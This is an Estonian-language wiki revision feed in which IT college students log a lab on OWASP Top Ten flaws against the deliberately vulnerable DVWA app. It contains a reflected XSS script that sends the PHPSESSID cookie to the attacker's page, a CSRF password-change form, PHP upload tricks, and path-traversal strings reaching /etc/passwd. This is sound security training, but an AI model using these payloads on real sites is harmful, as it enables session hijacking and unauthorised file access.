&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
/var/log/apache2/access.log&lt;br /&gt;
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46838</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46838"/>
		<updated>2012-03-28T11:36:14Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Reflected Cross Site Scripting (XSS) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;Xsstesting.jpg&amp;quot;/&amp;gt;&lt;br /&gt;
Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
Easy puhul:&lt;br /&gt;
Saab sisestada textboxi skripti:&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&lt;br /&gt;
Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
Näide logist:&lt;br /&gt;
/var/log/apache2/access.log&lt;br /&gt;
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46835</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=46835"/>
		<updated>2012-03-28T11:34:24Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Matise tegevus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidga tutvumine ==&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce.&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud - selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse ja selleks panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada, siis oli päringute tegemise kiirus vähem kui 1päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
